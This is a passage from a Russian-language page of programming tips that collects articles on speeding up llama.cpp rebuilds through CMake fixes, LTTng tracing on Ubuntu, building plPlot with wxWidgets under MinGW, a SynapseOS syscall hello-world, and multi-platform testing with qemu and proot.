"${CMAKE_CURRENT_SOURCE_DIR}/build-info.cpp.in") set(OUTPUT_FILE "${CMAKE_CURRENT_BINARY_DIR}/build-info.cpp") configure_file(${TEMPLATE_FILE} ${OUTPUT_FILE}) set(TARGET build_info) add_library(${TARGET} OBJECT ${OUTPUT_FILE}) , где файл шаблона c++ int LLAMA_BUILD_NUMBER = @LLAMA_BUILD_NUMBER@; char const *LLAMA_COMMIT = "@LLAMA_BUILD_COMMIT@"; char const *LLAMA_COMPILER = "@BUILD_COMPILER@"; char const *LLAMA_BUILD_TARGET = "@BUILD_TARGET@"; Проблема такого решения в том, что при каждом запуске CMake пересоздаётся файл "${OUTPUT_FILE}", а от него уже транзитивно зависят все инструменты, что приведёт к их перелинковке. Ninja не считает хеши файлов, он определяет изменения файлов по атрибутам уровня файловой системы, за хешами - к "ccache". В то же время Ninja отслеживает изменения в командной строке компилятора по контенту, поэтому в данном случае предпочтительнее не пересоздавать файл исходного кода, а использовать макроопределения. Ещё я заменил OBJECT на STATIC. OBJECT в CMake поддерживается не особо официально, долгое время он был вообще недокументированой внутренней возможностью, о которой, тем не менее, все знали, и по-прежнему ломается в очень многих случаях (патч). 6. В бэкэндах, связанных с OpenCL, с помощью питоньего скрипта генерятся заголовочные файлы с хардкодом исходного кода OpenCL-ядер. Во-первых это трогает файлы при каждом запуске CMake, что приведёт к пересборке, во-вторых данную проблему можно решить исключительно с помощью CMake, использование Python здесь излишне. В-третьих хардкод ядер в бинарник - это антипаттерн. У них есть опция ядра не хардкодить, но они забыли их установить! 7. "common" сливает в одну либу кучу всякой всячины, часть из которой которая нужна далеко не во всех инструментах, а часть нужна абсолютно во всех, напр. управление контекстом, и вебсервер и парсинг аргументов командной строки в конфиг, и контролируемая генерация - всё собрано в этой библиотеке, превращённой в монструозную помойку размером в 37 мегабайт отстрипанных, которая до наших патчей ещё статически линковалась в каждый инструмент. В результате изменение вещи нужной для меньшинства инструментов приводит к перелинковке всех инструментов. 8. Ещё имеет смысл запачить сборку ненужных бэкендов (она не настраивается гибко, и не мне это исправлять). === Другие патчи исправляют ошибки и добавляют улучшения, обсуждать их не имеет смысла, так как с антипаттернами, влияющими на скорость сборки, они не связаны. Апстрим всех патчей, как всегда, на вас, все что можно идёт под Unlicense (но содержат код, производный от оригинала под MIT), можете вообще от своего имени. Единственное, что надо отметить: вы не можете просто взять и переместить библиотеки в другую директорию, как это сделано в Дебиане, из-за ошибки CMake: https://gitlab.kitware.com/cmake/cmake/-/issues/22621 . Дело в том, что по факту CMake не поддерживает установку библиотек в какие-либо директории, которые и так не находятся в RPATH, потому что машинерия CMake, которая патчит RPATH в бинарях при установке, не пытается собирать RPATH из путей установки линкуемых библиотек. Соответственно все библиотеки и приложения, которые залинковали библиотеку, устанавливаемую не в место по умолчанию, её не найдут. В CMake нет опции, позволяющей это поправить, все опции, которые вы можете нагуглить для верси 4.2 делают другие вещи. Это определённо баг, так как функциональность установки CMake вместе с CPack должна собирать работоспособные пакеты, а место установки - оно определяется не в скрипте сборки, а собирающим. Можно данную проблему поправить на уровне костыльного CMake-кода, ставящего RPATH вручную, если он не совпадает с "CMAKE_INSTALL_LIBDIR", но определённо это должно не так работать, и в этом проекте для этого придётся править код каждого инструмента, скорее всего апстрим такое не примет. В Дебиане проблему решают (см. https://salsa.debian.org/deeplearning-team/llama.cpp и https://salsa.debian.org/deeplearning-team/ggml.git ) собирая GGML из отдельного репозитория (что в общем-то было бы правильно, но...), и для каждого вызова CMake вручную ставя RPATH в "debian/rules", но проблема в том, что отдельный репозиторий для GGML теперь не является основным, а основной "ggml" живёт в репозитории llama.cpp и иногда синхронизируется в ggml-евский и "whisper.cpp" копированием кода ("whisper.cpp" давно пора удалить, так как поддержка новых мультимодальных моделей (включая модели для TTS и ASR) завозятся в "llama.cpp"). Это неправильно и грязно, но это не мне решать, раз разрабам llama так удобно - то пусть в монорепе держат. Но в таком случае по-хорошему репозиторий "ggml" не мешало бы либо просто удалить, чтобы сломать всем скрипты сборки и делом довести до сведения, откуда надо теперь ggml ставить, либо заменить на CMake скрипт, использующий "FetchProject". А пока есть шанс, что в Дебиане llama будет слинкована с неподходящим ggml. Все патчи можно скачать единым архивом. Архив имеет 2 директории, в одной патчи для ускорения пересборки, а в другой - другие патчи, исправляющие некоторые проблемы и потенциальные проблемы в скриптах сборки, и имеющие некоторое отношение к пакетированию. Желателен апстрим всех. Ещё желателен рефактор ggml-части с разносом файлов исходников по директориям.

C/C++, сборка, отладка

Использование LTTng для прозрачной трассировки приложений в Ubuntu Linux (доп. ссылка 1) [комментарии]

Система трассировки LTTng (http://lttng.org/) работает на уровне Linux-ядра и отличается минимальным влиянием на работу профилируемого приложения, что позволяет приблизить условия работы данного приложения к его выполнению без использования трассировки (например, позволяет выявлять проблемы с производительностью в программах, работающих в реальном режиме времени). Поддержка LTTng пока не включена в состав Linux-ядра, но недавно для Ubuntu Linux был подготовлен специальный PPA-репозиторий, позволяющий значительно упростить установку LTTng. Приведем пример использования LTTng для отладки системы и тюнинга производительности. Подключаем репозиторий: sudo add-apt-repository ppa:lttng/ppa sudo aptitude update Устанавливаем компоненты для трассировки ядра (LTTng работает только с ядром 2.6.35, поэтому в Ubuntu 10.04 может потребоваться установка экспериментального пакета с более новым ядром): sudo apt-get install lttng Установка утилит для трассировки пользовательских приложений: sudo apt-get install ust-bin libust-dev liburcu-dev Пример поддержи трассировки на уровне ядра Загружаем ядро lttng: sudo ltt-armall Начинаем трассировку: sudo lttctl -C -w /tmp/trace1 программа Прекращаем трассировку: sudo lttctl -D программа Результаты трассировки /tmp/trace1 теперь можно открыть в утилите lttv или использовать режим текстового дампа: lttv -m textDump -t /tmp/trace1 | grep ... Трассировка пользовательских приложений со связыванием специальной библиотеки Собираем приложения добавив в опции сборки флаг '-lust'. Запускаем приложение с трассировкой: usttrace исследуемая_программа Контроль трассировки с удаленной машины На локальной машине устанавливаем и запускаем программу-агент: sudo apt-get install tcf-lttng-agent sudo tcf-agent На удаленной машине устанавливаем и запускаем клиента: sudo apt-get install tcf-lttng-client tcf-client далее, в появившейся консоли вводим: connect ip_локальной_машины и после соединения передаем управляющие команды: tcf ltt_control getProviders tcf ltt_control setupTrace "kernel" "0" "traceTest" Пример трассировки Рассмотрим для примера простую программу, открывающую файл и записывающую в него циклично числа. #include <stdio.h> #define INT_MAX 2147483647 int main(volatile int argc, char **argv) { int i = 3; FILE *fd = fopen("test.out", "w"); fwrite(&i, sizeof(int), 1, fd); fclose(fd); volatile long a; int x; for (x = 0; x<INT_MAX; x++) { a++; } return 0; } Собираем данную программу: gcc -o usecase usecase.c Теперь попробуем выполнить трассировку при помощи LTTng. Активируем точки трассировки в ядре: sudo ltt-armall Для автоматизации выполнения активации трассировки, запуска программы и остановки трассировки напишем небольшой скрипт trace-cmd.sh: #!/bin/sh if [ -z "$@" ]; then echo "missing command argument" exit 1 fi cmd="$@" name="cmd" dir="$(pwd)/trace-$name" sudo rm -rf $dir sudo lttctl -o channel.all.bufnum=8 -C -w $dir $name echo "executing $cmd..." $cmd echo "return code: $?" sudo lttctl -D $name Запускаем: ./trace-cmd.sh ./usecase После выполнения трассировки для наглядного анализа результатов запускаем GUI-утилиту lttv-gui, заходим в меню File->Add и выбираем директорию трассировки "trace-имя", сохраненную в каталоге, в котором был запущен скрипт trace-cmd.sh. Каждое из событий трассировки представлено в виде графика. Для нашего тестового приложения будет присутствовать три фазы: создание/доступ к файлу, вычислительная фаза и завершение процесса. Оценка различий от strace Если сравнить результаты работы стандартной утилиты strace: strace -o usecase.strace ./usecase В дополнение к системным вызовам, LTTng учитывает задействование подсистем ядра, события планировщика задач, обработку прерываний и прочие детали, недоступные в выводе strace. Но самым интересным отличием от strace является то, что программа никаким образом не может определить, что подвергается трассировке. Время наступления событий отображается в наносекундах. Влияние на производительность трассировки минимально, тестирование показало, что работа замедляется не более чем на 3%.

Как подружить plPlot и wxWidgets под ОС Windows Автор: KoD [комментарии]

0) Введение. Данный материал рассчитан на начинающих программистов, в частности, студентов, которым поможет избежать огромного количества подводных камней, таящихся на пути к использованию этих мощных программных продуктов. 0.1) wxWidgets В сети очень много материала про данную библиотеку, поэтому отмечу здесь только основной плюс, что она не имеет лицензионных ограничений в отличие от аналогичного продукта в виде библиотеки Qt, и позволяет легко писать свободное и коммерческое ПО любому желающему. Со всей богатой документацией можно ознакомиться на официальном сайте. 0.2) plPlot plPlot так же является свободно распространяемой (LGPL) библиотекой, предназначенной для построения графиков функций в 2х-мерном и 3х-мерном пространствах, различных видов и форм. В связке с библиотекой wxWidgets дает практически неограниченные возможности по визуализации данных в различных областях применения, от систем мониторинга до финансовых приложений, калькуляторов и расчетных систем. Ссылка на официальный сайт. Обе библиотеки распространяются в виде исходного кода, а значит на OS Windows, необходимо будет их собрать и скомпилировать при помощи утилиты CMake и компилятора gcc из пакета MinGW32. На момент написания статьи самые свежие версии необходимого ПО были:
CMake - 3.12.4;
Mingw BASE-bin - 2013072200, gcc-c++ - 6.3.0-1;
wxWidgets - 3.0.4 Stable;
plPlot - 5.13.0;
IDE code::Blocks - 17.12; Рекомендую использовать именно данную конфигурацию для более предсказуемого результата. 1) Установка утилит и компиляторов 1.1)Cmake Качаем установщик в соответствии с разрядностью своей операционной системы
x32
x64 Запускаем..., далее..., далее..., после установки необходимо добавить в переменную %PATH% путь к каталогу "CMake\\bin\\", в стандартной установке это "C:\\Program Files\\CMake\\bin", сделать это можно через Пуск/ Панель управления/ Система/ Дополнительные параметры/ Переменные среды. 1.2) MinGW32 На официальном сайте забираем утилиту "MinGW Installation Manager (mingw-get)" из раздела "Downloads". Запускаем ее и в открывшемся окне через правую кнопку мыши отмечаем для установки пакеты "mingw32-base-bin" и "mingw32-gcc-g++-bin", затем в меню "Installaton" жмем на "Apply Changes" и дожидаемся установки всех пакетов. В случае сбоя недостающие библиотеки можно докачать с репозитория MinGW на sourceforge.net. Нужно убедиться в том, что установилась библиотека "MinGW\\lib\\libgdiplus.a" и заголовочный файл "MinGW\\include\\gdiplus.h". Так же добавляем путь к каталогу "bin\\" в переменную %PATH%, в стандартной установке это "C:\\MinGW\\bin" 2) Установка библиотеки wxWidgets На сайте библиотеки в разделе Downloads качаем установочный файл с исходными текстами и распаковываем.. Путь по-умолчанию будет в корне диска "c:\\wxWidgets-3.0.4\\", и желательно, чтобы он не содержал кириллицы и пробелов. Перед установкой редактируем файл "wxWidgets-3.0.4\\include\\wx\\msw\\setup.h", меняем в нем переменную wxUSE_GRAPHIC_CONTEXT=0 на 1 для всех компиляторов. Затем копируем этот "setup.h" в каталог "wxWidgets-3.0.4\\include\\wx\\" По невыясненным причинам компилятор выдает ошибку при сборке библиотеки, чтобы ее избежать редактируем "MinGW\\include\\stdio.h". Нужно закомментировать строку 345: // extern int __mingw_stdio_redirect__(snprintf)(char*, size_t, const char*, ...); Далее, нужно открыть командную строку через Пуск-Выполнить - cmd В командной строке: cd c:\\wxWidgets-3.0.4\\build\\msw mingw32-make -f makefile.gcc SHARED=1 UNICODE=1 BUILD=release MONOLITHIC=0 Компиляция обычно занимает до получаса, в результате в каталоге "wxWidgets-3.0.4\\lib\\gcc_dll" дожны появиться бинарные файлы библиотек. Можно идти далее... 3) Установка библиотеки plPlot Качаем исходники с офциального сайта, распаковываем во временный каталог "c:\\Temp\\" или другой, но только не в корень диска, так как там, в результате, будет бинарная сборка. Для успешной компиляции необходимо произвести следующие действия:
Скопировать из "wxWidgets-3.0.4\\lib\\gcc_dll\\" файлы "wxbase30u_gcc_custom.dll" и "wxmsw30u_core_gcc_custom.dll" в каталог "Temp\\plplot-5.13.0\\dll\\"
Отредактировать "Temp\\plplot-5.13.0\\drivers\\wxwidgets_dev.cpp" строку под номером 647 rand_s(&m_seed); и привести ее к виду: m_seed = rand(); Сохранить файл. В командной строке Windows cmd: cd c:\\Temp\\plplot-5.13.0\\ cmake -G "MinGW Makefiles" -DCMAKE_INSTALL_PREFIX=c:\\plplot\\ -DENABLE_wxwidgets=ON -DPLD_wxwidgets=ON Необходимо убедиться в отсутствии ошибок и что переменные установлены верно: .... a lot of output .... wxWidgets_FOUND=TRUE .... a lot of output .... ENABLE_wxwidgets=ON Если что-то пошло не так, нужно выяснить причину, удалить каталог "CMakeFiles\\" и файл "CMakeCache.txt" и запустить CMake повторно. Опять переходим в командную строку: mingw32-make Дожидаемся успешной компиляции и в cmd от имени Администратора: cd c:\\Temp\\plplot-5.13.0\\ mingw32-make install После указанных действий появляется каталог "c:\\plplot\\" c бинарной сборкой библиотеки и заголовочными файлами. 4) Установка среды разработки приложений Code::Blocks Здесь особых нюансов не предвидется. Качаем C::B с официального сайта, запускаем установщик и убеждаемся, что система увидела компилятор. Запускаем IDE с рабочего стола двойным щелчком. 5) Проба пера: "Hello, World!" На начальном экране Code::Blocks нажимаем "Create New Project", в выпадающем списке "Category"->"GUI", нажать "new wxWidgets Project". В диалоге нужно выбрать версию wxWidgets-3.0.x, далее, директорию проекта и название, имя автора, далее установить буллеты: Preferred GUI Builder - [o]wxSmith Application type - [o]Frame based далее, "wxWidgets location" - "c:\\wxWidgets-3.0.4" , далее, установить галочки в "wxWidgets library settings": [V] Use wxWidgets dll [V] Enable Unicode Finish. Раскроется окно GUI-Builder'а wxSmith. Здесь в окне "Management" переходим во вкладку "Projects" и правым щелчком мыши на названии проекта в контекстном выбираем "Build options". Откроется окно "Project build options", на вкладке "Linker settings" добавляем 3 библиотеки кнопкой "Add" это (одной строкой): plplot.dll;plplotcxx.dll;plplotwxwidgets.dll; на вкладке "Search directories":
для "Compiler" добавить "c:\\plplot\\include",
для "Linker" добавить "c:\\plplot\\lib". 5.1) Можно приступить к программированию.. В дереве проекта открываем файл "Headers - Main.h" и добавляем заголовки: #include <wx/dc.h> #include <wx/dcclient.h> #include <wx/dcmemory.h> #include <plplot/wxPLplotstream.h> В секции private класса Фрейма пишем: private: int w, h; wxBitmap bmp; wxMemoryDC mdc; wxPLplotstream pls; Открываем файл "Sources - Main.cpp" и в теле конструктора Фрейма testFrame::testFrame(wxWindow* parent,wxWindowID id) после служебного кода вставляем: GetSize(&w, &h); bmp.Create( w, h, -1 ); mdc.SelectObject(bmp); if(! pls.IsValid()){ pls.Create((wxDC*)&mdc, w, h, wxPLPLOT_NONE); } const int NSIZE = 80; PLFLT x[NSIZE], y[NSIZE]; x[0] = (-1) * NSIZE/4; y[0] = x[0] * x[0]; for(int i=1; i < NSIZE; i++){ x[i] = x[i - 1] + 0.5; y[i] = x[i] * x[i]; } pls.env(-20., 20., -10., 100, 0, 1); pls.width(2); pls.col0(3); pls.line(NSIZE, x, y); Затем, необходимо в окне "Management" на вкладке "Resources" открыть wxSmith, выделить главное окно и создать обработчик события EVT_PAINT в разделе "{}" Events. Функция автоматически называется "OnPaint". В ее теле вводим код: void testFrame::OnPaint(wxPaintEvent& event) { int width, height; GetSize( &width, &height ); height = height; // Check if we window was resized (or dc is invalid) if((w != width) || (w != height) ) { w = width; h = height; mdc.SelectObject( wxNullBitmap ); bmp.Create(w,h, mdc); mdc.SelectObject(bmp); pls.SetSize( width, height ); pls.replot(); Refresh(false); } wxPaintDC dc(this); dc.Blit(0,0,w,h,(wxDC*)&mdc,0,0); } Для запуска приложения потребуются бинарники всех библиотек, так что копируем из "wxWidgets-3.0.4\\lib\\gcc_dll\\" файлы "wxbase30u_gcc_custom.dll" и "wxmsw30u_core_gcc_custom.dll", из "plplot\\bin" все 5 dll файлов и из "plplot\\lib\\plplot5.13.0\\drivers" файл "wxwidgets.dll" в каталог проекта "bin\\Debug", туда, где будет собран основной .exe файл. Итого, минимальный список библиотек:
libcsirocsa.dll
libplplot.dll
libplplotcxx.dll
libplplotwxwidgets.dll
libqsastime.dll
wxwidgets.dll
wxmsw30u_gcc_custom.dll
wxmsw30u_core_gcc_custom.dll Теперь можно спокойно собрать проект и запустить бинарный файл. в итоге получается такая симпатичная парабола. По вопросам сборки библиотек, прошу обращаться на почту автора xsrc@mail.ru.

Ускорение пересборки llama.cpp (доп. ссылка 1) Автор: Аноним [комментарии]

При работе с llama.cpp имеется постоянная необходимость её пересобирать, так как в отличие от ONNX Runtime GGUF-файлы не хранят сериализованный граф вычислений, вместо этого процедура инференса вручную кодится в C++-коде, и за счёт применения информации, которую в ONNX обычно не сериализуют (ONNX обычно экспортируется автоматически, но знания можно туда встроить, если закодировать конструирование ONNX-графа вручную), может быть достигнута большая эффективность (по потреблению ресурсов) инференса. Это приводит к тому, что для того, чтобы исполнять модель на llama.cpp необходимы усилия программистов. В большинстве случаев каждая новая модель обладает уникальной архитектурой, и в большинстве случаев её поддержка кодится в проект сотрудниками компании-разработчика самой модели, если компания нуждается в продвижении своих моделей (зачастую такие модели распространяются под проприетарной лицензией, запрещающей коммерческое использование без заключения договора, при этом они закрывают некоторые потребности тех, кому нужен экономичный к ресурсам инференс). Так как структура проекта не подразумевает динамической загрузки отдельно собираемой разделяемой библиотеки с архитектурой модели, то при добавлении моделей или возможностей приходится пересобирать весь проект. Это обосновано, так как архитектура проекта и его API не являются стабильными и код одной реализации модели переиспользуется в другой. Однако проект имеет некоторые проблемы. Которые, впрочем, "никому" "не мешают", так как нейросети (стереотипно "тяжёлое" приложение, не смотря на то, что существуют мелкие нейросети размером в несколько мебибайт) запускать на "калькуляторе", "обогревателе" и "музейном хламе со свалки" никто "в здравом уме" (со слов "здравомыслящих") не будет. Проблемы заключаются в том, что проект долго компилируется и долго линкуется, и при этом имеет тенденцию требовать пересборки и перелинковки при малейших вроде-бы безобидных изменениях, вроде изменения переменной "CMAKE_INSTALL_LIBDIR". Я проанализировал и исправил некоторые, но не все, причины подобного поведения. Причины заключаются в том, что в проекте использованы приёмы, являющиеся антипаттернами, которые было бы неплохо разобрать, чтобы вы так не делали. 1. Проект полагается на пару больших заголовочных файлов. Почти любое функциональное изменение требует модификации этих заголовочных, а любая их модификация приводит к полной перекомпиляции проекта. Это не то, что мы можем поправить парой патчей, это требует изменений в процессах. 2. Проект имеет в нескольких местах "add_library(${TARGET} STATIC". Это приводит к тому, что некоторые куски кода линкуются статически в некоторые другие куски кода. Это, конечно, должно приводить к более быстрому коду при линковке с LTO, но линковка с LTO тот ещё тормоз, а инструментов в проекте мнооогооо, и никто и не задавался вопросом, нужна ли конкретно вон там максимальная производительность, достигаемая инлайном и стиранием границы между модулями, или всё же heavy lifting у нас делает GGML, и основная часть вычислений жрётся инференсом, а оптимизация консольной обёртки вокруг GGML даст очень немного. При этом хардкод STATIC а равно SHARED является антипаттерном, так как в проектах на CMake это решение принимается теми людьми, кто исходник собирает в бинарники, и выставляется через стандартную переменную CMake "BUILD_SHARED_LIBS". Поэтому целесообразно там стереть STATIC, и при "set(BUILD_SHARED_LIBS ON)" это нам срежет время линковки. Поскольку библтотеки теперь могут быть SHARED, добавляем их установку (патч). 3. В проекте присутствует код cmake target_compile_definitions(ggml-base PRIVATE GGML_VERSION="${GGML_INSTALL_VERSION}" GGML_COMMIT="${GGML_BUILD_COMMIT}" ) При этом "GGML_BUILD_COMMIT" и "GGML_INSTALL_VERSION" динамически генерятся при запуске CMake. "ninja" автоматически определяет, какие объектные файлы нуждаются в перекомпиляции, и изменение аргументов вызова компилятора - это показание к перекомпиляции. Что приводит к тому, что при любом коммите "ggml-base" пересобирается полностью, а линкующие его бинари - перелинковываются, а от "ggml-base" транзитивно зависит почти весь проект. Указанные макроопределения используются ровно в одних местах - в реализациях методов, возвращающих указанные значения, дальнейший доступ к этим значениям идёт исключительно через методы. Имеет смысл вынести указанные методы в отдельную библиотеку. Линковать я её бы, разумеется, предпочёл бы в соответствии с "BUILD_SHARED_LIBS", но так как смысл этих методов - быть прибитыми к файлу библиотеки ggml-base гвоздями, то вот тут как раз хардкодим "STATIC" (патч). 4. В проекте присутствует cmake () target_compile_definitions(ggml PUBLIC GGML_BACKEND_DIR="${GGML_BACKEND_DIR}") , при этом макроопределение "GGML_BACKEND_DIR" за пределами библиотеки "ggml" не используется. Использование "PUBLIC" приводит к тому, что все бинари, которые линкуют "ggml", получат в командной строке вызова своего компилятора это определение. Соответственно, если вы потрогаете эту переменную, то это приведёт к почти полной перекомпиляции проекта. При этом это макроопределение используется в коде ровно в одном месте: "search_paths.push_back(fs::u8path(GGML_BACKEND_DIR));", и поэтому "PUBLIC" нужно смело менять на "PRIVATE". По-хорошему путь вообще не должен хардкодиться, а должен определяться относительно бинарей. В проекте используется поиск в директории бинарей, но путь относительно неё не конфигурируется, а задание "GGML_BACKEND_DIR" используется для того, чтобы shared-библиотеки бэкендов легли не в "/usr/bin". Подход в некоторой степени странный. Логичнее сделать конфигурируемым путь относительно директории бинарника, тогда при изменении префикса пересобирать библиотеку не придётся, ибо относительный путь останется тем же (патч). 5. В директории "common" в "CMakeLists.txt" есть кусочек cmake set(TEMPLATE_FILE "${CMAKE_CURRENT_SOURCE_DIR}/build-info.cpp.in") set(OUTPUT_FILE "${CMAKE_CURRENT_BINARY_DIR}/build-info.cpp") configure_file(${TEMPLATE_FILE} ${OUTPUT_FILE}) set(TARGET build_info) add_library(${TARGET} OBJECT ${OUTPUT_FILE}) , где файл шаблона c++ int LLAMA_BUILD_NUMBER = @LLAMA_BUILD_NUMBER@; char const *LLAMA_COMMIT = "@LLAMA_BUILD_COMMIT@"; char const *LLAMA_COMPILER = "@BUILD_COMPILER@"; char const *LLAMA_BUILD_TARGET = "@BUILD_TARGET@"; Проблема такого решения в том, что при каждом запуске CMake пересоздаётся файл "${OUTPUT_FILE}", а от него уже транзитивно зависят все инструменты, что приведёт к их перелинковке. Ninja не считает хеши файлов, он определяет изменения файлов по атрибутам уровня файловой системы, за хешами - к "ccache". В то же время Ninja отслеживает изменения в командной строке компилятора по контенту, поэтому в данном случае предпочтительнее не пересоздавать файл исходного кода, а использовать макроопределения. Ещё я заменил OBJECT на STATIC. OBJECT в CMake поддерживается не особо официально, долгое время он был вообще недокументированой внутренней возможностью, о которой, тем не менее, все знали, и по-прежнему ломается в очень многих случаях (патч). 6. В бэкэндах, связанных с OpenCL, с помощью питоньего скрипта генерятся заголовочные файлы с хардкодом исходного кода OpenCL-ядер. Во-первых это трогает файлы при каждом запуске CMake, что приведёт к пересборке, во-вторых данную проблему можно решить исключительно с помощью CMake, использование Python здесь излишне. В-третьих хардкод ядер в бинарник - это антипаттерн. У них есть опция ядра не хардкодить, но они забыли их установить! 7. "common" сливает в одну либу кучу всякой всячины, часть из которой которая нужна далеко не во всех инструментах, а часть нужна абсолютно во всех, напр. управление контекстом, и вебсервер и парсинг аргументов командной строки в конфиг, и контролируемая генерация - всё собрано в этой библиотеке, превращённой в монструозную помойку размером в 37 мегабайт отстрипанных, которая до наших патчей ещё статически линковалась в каждый инструмент. В результате изменение вещи нужной для меньшинства инструментов приводит к перелинковке всех инструментов. 8. Ещё имеет смысл запачить сборку ненужных бэкендов (она не настраивается гибко, и не мне это исправлять). === Другие патчи исправляют ошибки и добавляют улучшения, обсуждать их не имеет смысла, так как с антипаттернами, влияющими на скорость сборки, они не связаны. Апстрим всех патчей, как всегда, на вас, все что можно идёт под Unlicense (но содержат код, производный от оригинала под MIT), можете вообще от своего имени. Единственное, что надо отметить: вы не можете просто взять и переместить библиотеки в другую директорию, как это сделано в Дебиане, из-за ошибки CMake: https://gitlab.kitware.com/cmake/cmake/-/issues/22621 . Дело в том, что по факту CMake не поддерживает установку библиотек в какие-либо директории, которые и так не находятся в RPATH, потому что машинерия CMake, которая патчит RPATH в бинарях при установке, не пытается собирать RPATH из путей установки линкуемых библиотек. Соответственно все библиотеки и приложения, которые залинковали библиотеку, устанавливаемую не в место по умолчанию, её не найдут. В CMake нет опции, позволяющей это поправить, все опции, которые вы можете нагуглить для верси 4.2 делают другие вещи. Это определённо баг, так как функциональность установки CMake вместе с CPack должна собирать работоспособные пакеты, а место установки - оно определяется не в скрипте сборки, а собирающим. Можно данную проблему поправить на уровне костыльного CMake-кода, ставящего RPATH вручную, если он не совпадает с "CMAKE_INSTALL_LIBDIR", но определённо это должно не так работать, и в этом проекте для этого придётся править код каждого инструмента, скорее всего апстрим такое не примет. В Дебиане проблему решают (см. https://salsa.debian.org/deeplearning-team/llama.cpp и https://salsa.debian.org/deeplearning-team/ggml.git ) собирая GGML из отдельного репозитория (что в общем-то было бы правильно, но...), и для каждого вызова CMake вручную ставя RPATH в "debian/rules", но проблема в том, что отдельный репозиторий для GGML теперь не является основным, а основной "ggml" живёт в репозитории llama.cpp и иногда синхронизируется в ggml-евский и "whisper.cpp" копированием кода ("whisper.cpp" давно пора удалить, так как поддержка новых мультимодальных моделей (включая модели для TTS и ASR) завозятся в "llama.cpp"). Это неправильно и грязно, но это не мне решать, раз разрабам llama так удобно - то пусть в монорепе держат. Но в таком случае по-хорошему репозиторий "ggml" не мешало бы либо просто удалить, чтобы сломать всем скрипты сборки и делом довести до сведения, откуда надо теперь ggml ставить, либо заменить на CMake скрипт, использующий "FetchProject". А пока есть шанс, что в Дебиане llama будет слинкована с неподходящим ggml. Все патчи можно скачать единым архивом. Архив имеет 2 директории, в одной патчи для ускорения пересборки, а в другой - другие патчи, исправляющие некоторые проблемы и потенциальные проблемы в скриптах сборки, и имеющие некоторое отношение к пакетированию. Желателен апстрим всех. Ещё желателен рефактор ggml-части с разносом файлов исходников по директориям.

Создание программ под SynapseOS Автор: Арен Елчинян [комментарии]

Пример создания приложения "Hello World", используя clang и сисфункцию вывода для SynapseOS. Перед написанием любой программы нужно установить средства сборки. В Ubuntu: sudo apt install llvm lld Далее перейдём к теории. Сисфункции в SynapseOS вызываются через прерывание 0x80. Регистры сисфункций: eax - номер сисфункций ebx - параметр 1 edx - параметр 2 ecx - параметр 3 esi - параметр 4 edi - параметр 5 ebp - параметр 6 В eax также идёт результат выполнения. Пример вызова сисфункции: mov eax, 42 ; Получаем количество тиков int 80h ; Вызов прерывания Нас интересует сисфункция под номером 0 - вывод строки в консоль. На языке С это выглядит так: int print_str(char *str) { uint32_t result = 0; asm volatile("int $0x80" : "=a"(result) // result = eax (после выполнения) : "a"(SC_CODE_puts), // eax = SC_CODE_puts(0) "b"(str) // ebx = str ); return result; } int main() { return print_str("Hello world!\\n"); } Результат: Hello world! На ассемблере FASM: ; Hello World - FASM format ELF public main main: mov eax, 0 ; 0 - сисфункция mov ebx, hello ; параметры сисфункции int 80h ret hello db 'Hello world!\\n',0 Результат: Hello world!

Тестирование хелловорлда под 17 платформ одним скриптом Автор: Урри [комментарии]

В заметке рассказано как собрать и, главное, запустить и протестировать свой хелловорлд сразу под 17 платформ (29 вариантов сборки, так как почти каждая платформа идёт в двух вариантах: libc и musl) не создавая зоопарк виртуалок. Все желаемое осуществляется с помощью сборочного инструментарий void-linux, за что им огромное спасибо - работа проделана огромная. Итак, что нам надо:
Linux, любой (я использую Mint),
Git (им будем ставить инструментарий для сборки исходных текстов),
20+ ГБ на диске (у меня выделенный SSD, хотя все равно долго получается).
fuse-overlayfs
proot
qemu-static Все остальное автоматически доставится в процессе. Шаг 1: настройка основной среды. Этот шаг полностью описан в совете "Сборка и тестирование хелловорлда под 17 платформ одним скриптом" по ссылке https://www.opennet.dev/tips/3193_build_compile_test_arm_mips_x86_powerp.shtml Там же описана сборка. Следующие шаги предполагают, что шаг 1 проделан и все функционирует без ошибок. Шаг 2: установка fuse-overlayfs и proot В Linux Mint это производится с помощью "sudo apt install fuse-overlayfs proot". fuse-overlayfs нам нужен для того, чтобы не захламлять сборочный инструментарий. Мы будем "накладывать" ваш собранный хелловорлд (и все что с ним, вы же не только один бинарный файл будете собирать?) поверх рабочей файловой системы. proot нам нужен для создания рута (/), в котором и будет работать наша эмуляция всяких arm и mips. Шаг 3: qemu. Ставим qemu, причём нам нужны статически скомпонованные исполняемые файлы, так как мы их будем запускать в отдельном руте, не имеющем доступа к любым библиотекам хоста. Для тестирования всех платформ нам нужны будут вот эти: qemu-aarch64-static, qemu-arm-static, qemu-i386-static, qemu-mipsel-static, qemu-mips-static, qemu-ppc64le-static, qemu-ppc64-static, qemu-ppc-static, qemu-x86_64-static. В Linux Mint они ставятся с помощью "sudo apt install qemu-user-static". Шаг 4: пути. Создаём каталог "testing" прямо в нашем рабочем окружении (куда вы клонировали void-packages, у меня этот каталог так и называется - "void-packages"). Не будем выносить сор из избы. В этом каталоге заводим временные подкаталоги для fuse-overlayfs. Я их назвал по платформам (aarch64, armv5tel, armv7hf-musl, и т.д.) Полный список не даю - мы их будем автоматически создавать в скрипте. Шаг 5: скрипт. Создаём вот такой, немного увесистый скрипт (ну уж извините - платформ много, под каждую надо кое-что захардкодить) в том же рабочем каталоге ("void-packages"). Я назвал его "script.sh". Пара комментариев к скрипту (они же есть и в коде скрипта):
1. Очистка обязательна. Некоторые платформы между собой конфликтуют и без очистки у вас вполне возможно бинарник не запустится.
2. В скрипте считается, что ваша поделка инсталлируется как /usr/bin/helloworld. Если это не так - поправьте скрипт под себя.
